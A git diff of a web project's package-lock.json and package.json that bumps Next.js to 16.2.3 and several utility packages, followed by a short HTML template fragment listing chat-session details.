       "license": "MIT",
       "optional": true,
       "os": [
@@ -2245,12 +2248,15 @@
       }
     },
     "node_modules/@next/swc-linux-arm64-musl": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-16.1.6.tgz",
-      "integrity": "sha512-S4J2v+8tT3NIO9u2q+S0G5KdvNDjXfAv06OhfOzNDaBn5rw84DGXWndOEB7d5/x852A20sW1M56vhC/tRVbccQ==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-16.2.3.tgz",
+      "integrity": "sha512-/YV0LgjHUmfhQpn9bVoGc4x4nan64pkhWR5wyEV8yCOfwwrH630KpvRg86olQHTwHIn1z59uh6JwKvHq1h4QEw==",
       "cpu": [
         "arm64"
       ],
+      "libc": [
+        "musl"
+      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -2261,12 +2267,15 @@
       }
     },
     "node_modules/@next/swc-linux-x64-gnu": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-16.1.6.tgz",
-      "integrity": "sha512-2eEBDkFlMMNQnkTyPBhQOAyn2qMxyG2eE7GPH2WIDGEpEILcBPI/jdSv4t6xupSP+ot/jkfrCShLAa7+ZUPcJQ==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-16.2.3.tgz",
+      "integrity": "sha512-/HiWEcp+WMZ7VajuiMEFGZ6cg0+aYZPqCJD3YJEfpVWQsKYSjXQG06vJP6F1rdA03COD9Fef4aODs3YxKx+RDQ==",
       "cpu": [
         "x64"
       ],
+      "libc": [
+        "glibc"
+      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -2277,12 +2286,15 @@
       }
     },
     "node_modules/@next/swc-linux-x64-musl": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-16.1.6.tgz",
-      "integrity": "sha512-oicJwRlyOoZXVlxmIMaTq7f8pN9QNbdes0q2FXfRsPhfCi8n8JmOZJm5oo1pwDaFbnnD421rVU409M3evFbIqg==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-16.2.3.tgz",
+      "integrity": "sha512-Kt44hGJfZSefebhk/7nIdivoDr3Ugp5+oNz9VvF3GUtfxutucUIHfIO0ZYO8QlOPDQloUVQn4NVC/9JvHRk9hw==",
       "cpu": [
         "x64"
       ],
+      "libc": [
+        "musl"
+      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -2293,9 +2305,9 @@
       }
     },
     "node_modules/@next/swc-win32-arm64-msvc": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-16.1.6.tgz",
-      "integrity": "sha512-gQmm8izDTPgs+DCWH22kcDmuUp7NyiJgEl18bcr8irXA5N2m2O+JQIr6f3ct42GOs9c0h8QF3L5SzIxcYAAXXw==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-16.2.3.tgz",
+      "integrity": "sha512-O2NZ9ie3Tq6xj5Z5CSwBT3+aWAMW2PIZ4egUi9MaWLkwaehgtB7YZjPm+UpcNpKOme0IQuqDcor7BsW6QBiQBw==",
       "cpu": [
         "arm64"
       ],
@@ -2309,9 +2321,9 @@
       }
     },
     "node_modules/@next/swc-win32-x64-msvc": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-16.1.6.tgz",
-      "integrity": "sha512-NRfO39AIrzBnixKbjuo2YiYhB6o9d8v/ymU9m/Xk8cyVk+k7XylniXkHwjs4s70wedVffc6bQNbufk5v0xEm0A==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-16.2.3.tgz",
+      "integrity": "sha512-Ibm29/GgB/ab5n7XKqlStkm54qqZE8v2FnijUPBgrd67FWrac45o/RsNlaOWjme/B5UqeWt/8KM4aWBwA1D2Kw==",
       "cpu": [
         "x64"
       ],
@@ -4882,9 +4894,9 @@
       }
     },
     "node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": {
-      "version": "5.0.4",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.4.tgz",
-      "integrity": "sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==",
+      "version": "5.0.5",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz",
+      "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -5731,9 +5743,9 @@
       }
     },
     "node_modules/brace-expansion": {
-      "version": "1.1.12",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz",
-      "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==",
+      "version": "1.1.13",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.13.tgz",
+      "integrity": "sha512-9ZLprWS6EENmhEOpjCYW2c8VkmOvckIJZfkr7rBW6dObmfgJ/L1GpSYW5Hpo9lDz4D1+n0Ckz8rU7FwHDQiG/w==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -6785,13 +6797,13 @@
       }
     },
     "node_modules/eslint-config-next": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/eslint-config-next/-/eslint-config-next-16.1.6.tgz",
-      "integrity": "sha512-vKq40io2B0XtkkNDYyleATwblNt8xuh3FWp8SpSz3pt7P01OkBFlKsJZ2mWt5WsCySlDQLckb1zMY9yE9Qy0LA==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/eslint-config-next/-/eslint-config-next-16.2.3.tgz",
+      "integrity": "sha512-Dnkrylzjof/Az7iNoIQJqD18zTxQZcngir19KJaiRsMnnjpQSVoa6aEg/1Q4hQC+cW90uTlgQYadwL1CYNwFWA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@next/eslint-plugin-next": "16.1.6",
+        "@next/eslint-plugin-next": "16.2.3",
         "eslint-import-resolver-node": "^0.3.6",
         "eslint-import-resolver-typescript": "^3.5.2",
         "eslint-plugin-import": "^2.32.0",
@@ -7324,9 +7336,9 @@
       }
     },
     "node_modules/flatted": {
-      "version": "3.4.1",
-      "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.4.1.tgz",
-      "integrity": "sha512-IxfVbRFVlV8V/yRaGzk0UVIcsKKHMSfYw66T/u4nTwlWteQePsxe//LjudR1AMX4tZW3WFCh3Zqa/sjlqpbURQ==",
+      "version": "3.4.2",
+      "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.4.2.tgz",
+      "integrity": "sha512-PjDse7RzhcPkIJwy5t7KPWQSZ9cAbzQXcafsetQoD7sOJRQlGikNbx7yZp2OotDnJyrDcbyRq3Ttb18iYOqkxA==",
       "dev": true,
       "license": "ISC"
     },
@@ -8764,9 +8776,9 @@
       }
     },
     "node_modules/lodash": {
-      "version": "4.17.23",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.23.tgz",
-      "integrity": "sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==",
+      "version": "4.18.1",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz",
+      "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==",
       "license": "MIT"
     },
     "node_modules/lodash.merge": {
@@ -9828,14 +9840,14 @@
       "license": "MIT"
     },
     "node_modules/next": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/next/-/next-16.1.6.tgz",
-      "integrity": "sha512-hkyRkcu5x/41KoqnROkfTm2pZVbKxvbZRuNvKXLRXxs3VfyO0WhY50TQS40EuKO9SW3rBj/sF3WbVwDACeMZyw==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/next/-/next-16.2.3.tgz",
+      "integrity": "sha512-9V3zV4oZFza3PVev5/poB9g0dEafVcgNyQ8eTRop8GvxZjV2G15FC5ARuG1eFD42QgeYkzJBJzHghNP8Ad9xtA==",
       "license": "MIT",
       "dependencies": {
-        "@next/env": "16.1.6",
+        "@next/env": "16.2.3",
         "@swc/helpers": "0.5.15",
-        "baseline-browser-mapping": "^2.8.3",
+        "baseline-browser-mapping": "^2.9.19",
         "caniuse-lite": "^1.0.30001579",
         "postcss": "8.4.31",
         "styled-jsx": "5.1.6"
@@ -9847,15 +9859,15 @@
         "node": ">=20.9.0"
       },
       "optionalDependencies": {
-        "@next/swc-darwin-arm64": "16.1.6",
-        "@next/swc-darwin-x64": "16.1.6",
-        "@next/swc-linux-arm64-gnu": "16.1.6",
-        "@next/swc-linux-arm64-musl": "16.1.6",
-        "@next/swc-linux-x64-gnu": "16.1.6",
-        "@next/swc-linux-x64-musl": "16.1.6",
-        "@next/swc-win32-arm64-msvc": "16.1.6",
-        "@next/swc-win32-x64-msvc": "16.1.6",
-        "sharp": "^0.34.4"
+        "@next/swc-darwin-arm64": "16.2.3",
+        "@next/swc-darwin-x64": "16.2.3",
+        "@next/swc-linux-arm64-gnu": "16.2.3",
+        "@next/swc-linux-arm64-musl": "16.2.3",
+        "@next/swc-linux-x64-gnu": "16.2.3",
+        "@next/swc-linux-x64-musl": "16.2.3",
+        "@next/swc-win32-arm64-msvc": "16.2.3",
+        "@next/swc-win32-x64-msvc": "16.2.3",
+        "sharp": "^0.34.5"
       },
       "peerDependencies": {
         "@opentelemetry/api": "^1.1.0",
@@ -10248,9 +10260,9 @@
       "license": "ISC"
     },
     "node_modules/picomatch": {
-      "version": "2.3.1",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
-      "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+      "version": "2.3.2",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
+      "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -11453,9 +11465,9 @@
       }
     },
     "node_modules/tinyglobby/node_modules/picomatch": {
-      "version": "4.0.3",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz",
-      "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==",
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz",
+      "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
       "dev": true,
       "license": "MIT",
       "engines": {
diff --git a/web/package.json b/web/package.json
index a41573ffe..1763afe22 100644
--- a/web/package.json
+++ b/web/package.json
@@ -55,7 +55,7 @@
     "input-otp": "1.4.2",
     "lucide-react": "^0.564.0",
     "motion": "^12.36.0",
-    "next": "16.1.6",
+    "next": "16.2.3",
     "next-themes": "^0.4.6",
     "node-pty": "^1.1.0",
     "react": "19.2.4",
@@ -80,7 +80,7 @@
     "@types/react-dom": "19.2.3",
     "esbuild": "^0.27.4",
     "eslint": "^9.38.0",
-    "eslint-config-next": "16.1.6",
+    "eslint-config-next": "16.2.3",
     "postcss": "^8.5",
     "tailwindcss": "^4.2.0",
     "tw-animate-css": "1.3.3",

Model	${escapeHtml(info.modelName)}
Session	${escapeHtml(info.sessionName \|\| info.sessionId)}
Messages	${info.messageCount}
Thinking	${thinkingBadge}
Auto-compact	${autoCompBadge}